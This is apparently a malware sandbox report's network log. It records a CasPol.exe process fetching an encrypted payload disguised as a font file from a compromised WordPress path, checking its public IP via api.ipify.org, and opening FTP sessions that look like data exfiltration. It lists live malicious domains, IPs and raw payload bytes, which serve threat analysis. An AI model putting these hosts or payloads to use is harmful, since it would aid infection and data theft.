                                Nov 28, 2022 18:14:03.721308947 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721362114 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721364975 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721364975 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721415043 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721424103 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721470118 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721524000 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721527100 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721527100 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721527100 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721575975 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721611023 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721630096 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721683979 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721735954 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721751928 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721751928 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721791029 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721827984 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721828938 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721844912 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721898079 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721950054 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.721961975 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.721961975 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722002983 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722038031 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722038031 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722057104 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722110987 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722163916 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722187042 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722187996 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722187996 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722218037 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722270966 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722271919 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722316027 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722326040 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722368956 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722378969 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722457886 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722512960 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722520113 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722513914 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722573042 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722574949 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722625971 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722678900 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722683907 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722733021 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722785950 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722816944 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722840071 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722856045 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722893000 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.722917080 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722917080 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.722955942 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723025084 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723031044 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.723067999 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.723081112 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723134995 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723190069 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723217010 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.723217010 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.723242998 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723298073 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723356962 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.723366976 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723426104 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723479986 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723489046 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.723534107 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723603964 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723615885 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.723615885 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.723625898 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723648071 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723664999 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723686934 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723701000 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.723706007 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723723888 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723746061 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723763943 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723781109 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723798990 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723817110 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.723864079 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.723943949 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.837805033 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.837932110 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838031054 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838131905 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838216066 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838216066 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838241100 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838356972 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838402033 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838445902 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838457108 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838506937 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838563919 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838572979 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838618040 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838639975 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838673115 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838725090 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838768005 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838768005 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838778019 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838829994 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838844061 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838845015 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838884115 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838937998 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.838984966 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.838990927 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.839044094 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.839047909 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.839047909 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.839097023 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.839097977 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.839148998 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.839149952 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.839201927 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.839253902 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.839257002 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.839307070 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.839312077 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.839312077 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.839348078 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.839407921 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.839457035 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:08.794603109 CET49805443192.168.11.2054.91.59.199
                                Nov 28, 2022 18:14:08.794653893 CET4434980554.91.59.199192.168.11.20
                                Nov 28, 2022 18:14:08.794989109 CET49805443192.168.11.2054.91.59.199
                                Nov 28, 2022 18:14:08.840126038 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:08.840331078 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:08.874829054 CET49805443192.168.11.2054.91.59.199
                                Nov 28, 2022 18:14:08.874842882 CET4434980554.91.59.199192.168.11.20
                                Nov 28, 2022 18:14:09.186487913 CET4434980554.91.59.199192.168.11.20
                                Nov 28, 2022 18:14:09.186765909 CET49805443192.168.11.2054.91.59.199
                                Nov 28, 2022 18:14:09.198235989 CET49805443192.168.11.2054.91.59.199
                                Nov 28, 2022 18:14:09.198292017 CET4434980554.91.59.199192.168.11.20
                                Nov 28, 2022 18:14:09.199280977 CET4434980554.91.59.199192.168.11.20
                                Nov 28, 2022 18:14:09.253065109 CET49805443192.168.11.2054.91.59.199
                                Nov 28, 2022 18:14:09.949853897 CET49805443192.168.11.2054.91.59.199
                                Nov 28, 2022 18:14:09.992396116 CET4434980554.91.59.199192.168.11.20
                                Nov 28, 2022 18:14:10.096756935 CET4434980554.91.59.199192.168.11.20
                                Nov 28, 2022 18:14:10.096967936 CET4434980554.91.59.199192.168.11.20
                                Nov 28, 2022 18:14:10.097220898 CET49805443192.168.11.2054.91.59.199
                                Nov 28, 2022 18:14:10.098072052 CET49805443192.168.11.2054.91.59.199
                                Nov 28, 2022 18:14:17.892237902 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:17.924370050 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:17.924516916 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:17.958723068 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:17.959058046 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:17.991437912 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:17.991482973 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:17.991899967 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.040401936 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.040865898 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.073179960 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.073748112 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.106071949 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.106791973 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.139123917 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.139384031 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.171904087 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.173265934 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.205801964 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.207309961 CET4980856411192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.239545107 CET5641149808185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.239708900 CET4980856411192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.239839077 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.274036884 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.274476051 CET4980856411192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.274521112 CET4980856411192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.306560993 CET5641149808185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.306651115 CET5641149808185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.306859016 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:14:18.306870937 CET4980856411192.168.11.20185.31.121.136
                                Nov 28, 2022 18:14:18.307097912 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:15:53.011820078 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:15:53.323909044 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:15:53.933120012 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:15:55.136014938 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:15:57.541685104 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:15:57.776221037 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:15:57.808657885 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:15:57.808948994 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:15:57.809441090 CET2149807185.31.121.136192.168.11.20
                                Nov 28, 2022 18:15:57.809710026 CET4980721192.168.11.20185.31.121.136
                                Nov 28, 2022 18:16:02.353245974 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:16:11.960388899 CET4980380192.168.11.20192.185.145.188

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 28, 2022 18:14:03.095999956 CET5227853192.168.11.201.1.1.1
                                Nov 28, 2022 18:14:03.119677067 CET53522781.1.1.1192.168.11.20
                                Nov 28, 2022 18:14:08.765639067 CET5959453192.168.11.201.1.1.1
                                Nov 28, 2022 18:14:08.787539005 CET53595941.1.1.1192.168.11.20
                                Nov 28, 2022 18:14:17.763895035 CET5843553192.168.11.201.1.1.1
                                Nov 28, 2022 18:14:17.891381979 CET53584351.1.1.1192.168.11.20

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Nov 28, 2022 18:14:03.095999956 CET192.168.11.201.1.1.10x4412Standard query (0)b3solutionscws.comA (IP address)IN (0x0001)false
                                Nov 28, 2022 18:14:08.765639067 CET192.168.11.201.1.1.10xf773Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                Nov 28, 2022 18:14:17.763895035 CET192.168.11.201.1.1.10xead4Standard query (0)ftp.mcmprint.netA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Nov 28, 2022 18:14:03.119677067 CET1.1.1.1192.168.11.200x4412No error (0)b3solutionscws.com192.185.145.188A (IP address)IN (0x0001)false
                                Nov 28, 2022 18:14:08.787539005 CET1.1.1.1192.168.11.200xf773No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                Nov 28, 2022 18:14:08.787539005 CET1.1.1.1192.168.11.200xf773No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                Nov 28, 2022 18:14:08.787539005 CET1.1.1.1192.168.11.200xf773No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                Nov 28, 2022 18:14:08.787539005 CET1.1.1.1192.168.11.200xf773No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                Nov 28, 2022 18:14:08.787539005 CET1.1.1.1192.168.11.200xf773No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                Nov 28, 2022 18:14:17.891381979 CET1.1.1.1192.168.11.200xead4No error (0)ftp.mcmprint.net185.31.121.136A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • api.ipify.org
                                • b3solutionscws.com

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.11.204980554.91.59.199443C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.11.2049803192.185.145.18880C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                TimestampkBytes transferredDirectionData
                                Nov 28, 2022 18:14:03.248883963 CET308OUTGET /wp-admin/includes/UtXRqIMUipDp192.pfb HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Host: b3solutionscws.com
                                Cache-Control: no-cache
                                Nov 28, 2022 18:14:03.371316910 CET309INHTTP/1.1 200 OK
                                Date: Mon, 28 Nov 2022 17:14:03 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade
                                Last-Modified: Mon, 28 Nov 2022 12:17:04 GMT
                                Accept-Ranges: bytes
                                Content-Length: 222272
                                Content-Type: application/x-font-type1
                                Data Raw: 84 61 94 0d c9 bc 62 4f 9f 15 6c bc 0b 0e f6 b7 a2 56 25 35 8b 28 95 03 4e 64 d9 30 75 a3 9a 9c 77 17 3d 89 cd ac 4d 8d 45 6b f6 08 07 ff 7f 19 09 52 7f 9e b4 9e c6 c2 9d 3f 5a 90 5b f6 ee 0a 26 19 f6 2d 16 f8 fe 00 c4 8c e2 f3 c8 46 34 4e 3c 22 12 d3 0d ff 1f 12 63 11 eb 2d 6f 36 bc d4 7e 30 13 96 6c dc 2a 55 70 6f de 49 41 2d 25 8c d8 d9 48 df f3 a4 ca 1a 24 c0 ff 0b 0e ed 8c cc 6a 92 33 03 79 ad a5 52 3a 75 68 ab 16 e6 e3 b6 03 83 73 95 16 0a 00 15 93 1f 63 55 88 54 52 b7 ff 92 ef 05 bf 1a f0 49 97 26 6a 5a 6a 81 00 49 fa 6b 85 38 d5 29 37 c7 44 0a 9c 0a db 77 10 df 3b a5 1b e0 32 68 da 86 d8 de 5e 69 7a aa 63 12 5c dc ba e8 bd 5b 21 10 19 40 5a 19 9f 1a b5 bd ea e3 f3 0e fc b8 40 5b e9 ce e3 e2 98 fb fb 83 91 22 91 13 9b 22 57 92 5e ff 10 5d 19 d1 e7 4f 40 0d 2d 6b 3e eb a5 ef b9 e0 d0 46 17 b3 e3 59 db 61 58 5a e1 89 2e 87 d8 b6 7b 6d 0c c5 29 2b 48 9d e9 35 0f 1f f1 4a 64 d7 5f 83 5e d2 d9 c8 82 61 fb 19 69 fe 6a 68 03 56 91 aa 92 46 1c 88 ce 4f 5f f0 c5 72 7b b0 3b 61 79 e0 00 a1 89 2c 39 66 5e 1d 52 78 f6 30 c9 04 86 53 fb e8 8b 9a 6a f3 8a cd c5 e0 03 1c 0c 53 34 ab 7f 78 b2 1a 3f 6a c3 26 a1 30 2b fa d0 f1 f1 34 af fa 58 9f a2 a1 39 6c d3 2d 67 1d 37 e8 c0 06 b8 3b 1e 62 bb 8f 39 48 97 25 37 8b 19 7b ab e7 05 5f 57 24 68 51 1f 34 33 a7 3f 7b 05 2e 7f 08 51 09 bd 72 8b e6 33 2e cf 09 f8 c4 9c e1 28 f2 53 36 8a 4b e3 6f 1f 49 53 f1 e6 9a 7f 05 92 3d 40 c9 ff b1 d5 40 72 11 45 02 5c 5a a9 4f 1d a2 1d e2 57 e4 69 63 a9 8e 7e 8c 8b 7c 95 b6 6e d7 30 aa 2e 2e 59 a4 bd ae 5c ab d4 55 82 e3 f5 60 0a 72 fd b7 d4 38 96 d3 10 27 d7 44 6b f8 0c c4 e1 1e 0b 71 5e 2b 3f 15 26 43 0f ef 27 4e f3 dc 55 be 25 75 1b 7b 87 2c 98 41 6e 29 ea b7 11 3e 23 bd 2f 77 2c 0c 16 ec 0a 01 13 53 26 03 c7 71 2b ce b9 c3 20 72 79 e3 11 68 21 78 f1 78 03 ab 18 bf c3 24 7d 10 40 52 91 52 f3 ca 33 7c ce 32 c9 62 fe 39 6c 40 67 2b 52 75 b3 cc dd e8 7f 1d 78 ee f2 30 c5 f3 99 ac c5 84 a5 50 80 b5 00 50 b8 cf d9 ea fd 28 71 7c ac 15 50 ad b6 d0 c9 56 64 2f 77 f1 ba c6 de ff d2 3c 89 5d f2 e6 a8 7b fb 47 06 ed 62 ad 6b ff 15 0b 1f c6 15 c2 3e 45 bb d6 44 2b d4 5a 6a de c6 7f ad df 30 31 20 a8 84 7c 30 19 66 c9 30 26 6f 72 2a 9d 48 b9 c7 b2 47 d1 d8 78 03 e5 57 fc 22 74 fb 7c ed 8e 2f 4c 91 9e 84 ea 59 fe 6e 51 99 f0 3e 6e 82 7b 0a 55 9e ab 8e 10 76 21 2d 69 36 92 0e 80 7a 06 49 7b 33 f3 0f 6d 81 0b 34 8e 73 3b 18 29 07 a0 1c 99 d6 0e 84 95 02 f2 87 89 22 69 65 75 71 33 ab eb fc e0 9d 6a 19 80 56 d2 47 5a 01 56 01 a1 1a 14 80 69 fb ac 08 f0 de 26 bc b3 de 85 69 b5 88 14 15 40 e5 7b d6 85 1f 6c eb 7c 1f 25 f4 38 2a 61 6f c2 5e 13 2f f5 37 73 48 66 2a 03 06 ff 2c c2 9b e9 f3 30 a1 ca 4f a8 20 39 d1 26 1c 61 11 23 11 ef 42 63 36 bc de 54 23 23 94 6c f0 2a 55 70 6b de 49 50 3b 2e a7 c3 d9 4f c8 0d a5 e6 18 3c cb ff 0c 98 13 8d e0 66 9a 82 0d 7e 01 52 9e 37 cf 42 e5 f0 24 c9 da 6a f0 57 8a 69 65 67 6d d8 61 73 34 e9 14 3c d8 8b b7 8d 60 8e 7e 8e 0c ac 4f 03 6d d0 cf 7f 6b 8f 0f e1 5a ed da 3b e1 62 1d 97 0a dc 6f ee de 47 e2 30 e2 55 8a db 85 e4 04 2b 0a 70 82 71 12 5c d6 90 e8 5d 48 13 13 12 69 52 19 9f 40 b6 bd fb f3 f8 25 e7 b8 47 4c 39 b4 cc e0 80 d0 fb 84 87 dc 90 3f 99 35 1c 92 59 c7 ee 5c 35 d1 cc 4d 6f
                                Data Ascii: abOlV%5(Nd0uw=MEkR?Z[&-F4N<"c-o6~0l*UpoIA-%H$j3yR:uhscUTRI&jZjIk8)7Dw;2h^izc\[!@Z@[""W^]O@-k>FYaXZ.{m)+H5Jd_^aijhVFO_r{;ay,9f^Rx0SjS4x?j&0+4X9l-g7;b9H%7{_W$hQ43?{.Qr3.(S6KoIS=@@rE\ZOWic~|n0..Y\U`r8'Dkq^+?&C'NU%u{,An)>#/w,S&q+ ryh!xx$}@RR3|2b9l@g+Rux0PP(q|PVd/w<]{Gbk>ED+Zj01 |0f0&or*HGxW"t|/LYnQ>n{Uv!-i6zI{3m4s;)"ieuq3jVGZVi&i@{l|%8*ao^/7sHf*,0O 9&a#Bc6T##l*UpkIP;.O<f~R7B$jWiegmas4<`~OmkZ;boG0U+pq\]HiR@%GL9?5Y\5Mo
                                Nov 28, 2022 18:14:03.371407032 CET311INData Raw: ee 2f 43 2d eb a5 e5 97 f3 e0 44 17 9f e3 59 db a6 5b 5a f0 9d 25 ac c3 b6 7c 7a f0 c4 45 ac 50 96 f9 32 19 f1 f0 66 66 c0 44 83 59 da 27 c9 ae 63 d0 1b 52 1d ba 6d 03 56 93 82 86 46 1c 82 04 26 6c f2 8e 5a 7b b0 3b e9 7a e0 09 b4 82 07 22 66 59
                                Data Ascii: /C-DY[Z%|zEP2ffDY'cRmVF&lZ{;z"fYy2ThD QT2*j,#4X2G-`:b#C"/uwZW$s|-88lSu24IcSI=@C`YZT#8Wmv^0e-.Y
                                Nov 28, 2022 18:14:03.371470928 CET312INData Raw: 4a 88 0c ab 9d 50 63 7b 33 fd 1e 55 81 0b 3a 8c 4c 0b 1a 23 ab 90 1c 99 d0 70 ab 84 14 fd d2 a1 22 6e 76 a3 5c 1f a9 f9 77 cf 9a 7c e3 a9 57 d0 50 5b 29 20 1b 5f 1d 10 ac 42 f9 8d c3 a1 dc 26 b6 37 af 8e 69 b1 fc 1c 06 70 e3 57 f0 ad 8d 6c e8 7a
                                Data Ascii: JPc{3U:L#p"nv\w|WP[) _B&7ipWlz3PqZ-6hCf#54N*32B_6a"l"J{eK%JB5pu?yaucGrCH:<`HOp1@aB;nts)Yidz4OM
                                Nov 28, 2022 18:14:03.371532917 CET313INData Raw: 5f fc 5d 76 ad 59 17 b9 36 e2 50 98 b9 10 f6 e6 35 cb 8b 7c 87 da 44 d7 30 20 53 01 59 a0 b9 b8 74 cf d7 55 88 f5 db 5c 17 79 fd b0 ca c6 97 ff 55 0c e6 1b 4c 81 69 af 91 74 f5 70 7e 2e 28 1f 39 e9 07 ef 20 57 0d dd 79 d5 58 43 1b 7b 83 00 75 5d
                                Data Ascii: _]vY6P5|D0 SYtU\yULitp~.(9 WyXC{u]e)?O7>,?U /n /=u_Ox" gBR0xzbsLl+UlMUs(;P[G0/g9RIhv|wmk:6E|Mh$01|>`iz,|=
                                Nov 28, 2022 18:14:03.371597052 CET315INData Raw: fb 25 29 fd 66 0a 02 0b db 77 05 df 6b f1 0d ed 46 f8 d8 86 cc 15 22 11 84 ab 4f 15 64 56 bb e8 5d 47 2e 11 1b 5e 5b e7 9e 6a be 85 91 e4 f3 0e e3 b2 4d 5b ce aa ec 1c 99 f7 e6 81 fe 4c 91 13 91 0a 9c 90 5e d9 38 6f 19 d3 e1 67 c8 0f 2d 6d 16 c5
                                Data Ascii: %)fwkF"OdV]G.^[jM[L^8og-mKW$.z{mdA4#~eOS|`Qyhh~@4.5ZZP;e33_1z^Hvk_h<f;B$6[X!DZ/g.;h86%71+_>@457
                                Nov 28, 2022 18:14:03.371663094 CET316INData Raw: cd 1e c2 3d 2a 42 d7 68 25 7f 51 77 d5 c2 0b bb 21 31 17 aa d5 89 7c 34 6e 43 83 2f 25 e4 76 2d 84 b2 92 eb b9 52 8e a2 78 2f ef 41 cd c5 6e f0 6d fc 92 fa 56 bd 9b 8b 1f 58 d5 74 b7 93 dc 34 50 16 7b 26 51 fd a8 8e 17 75 d5 35 4e 34 be 1a 55 98
                                Data Ascii: =*Bh%Qw!1|4nC/%v-Rx/AnmVXt4P{&Qu5N4UTJl8gx?b u_f$k"nrpvPQ]!8P,kr}l}=ExoNy5mk"//Q>"b%9/o0~04eroN.|$<^&#%=
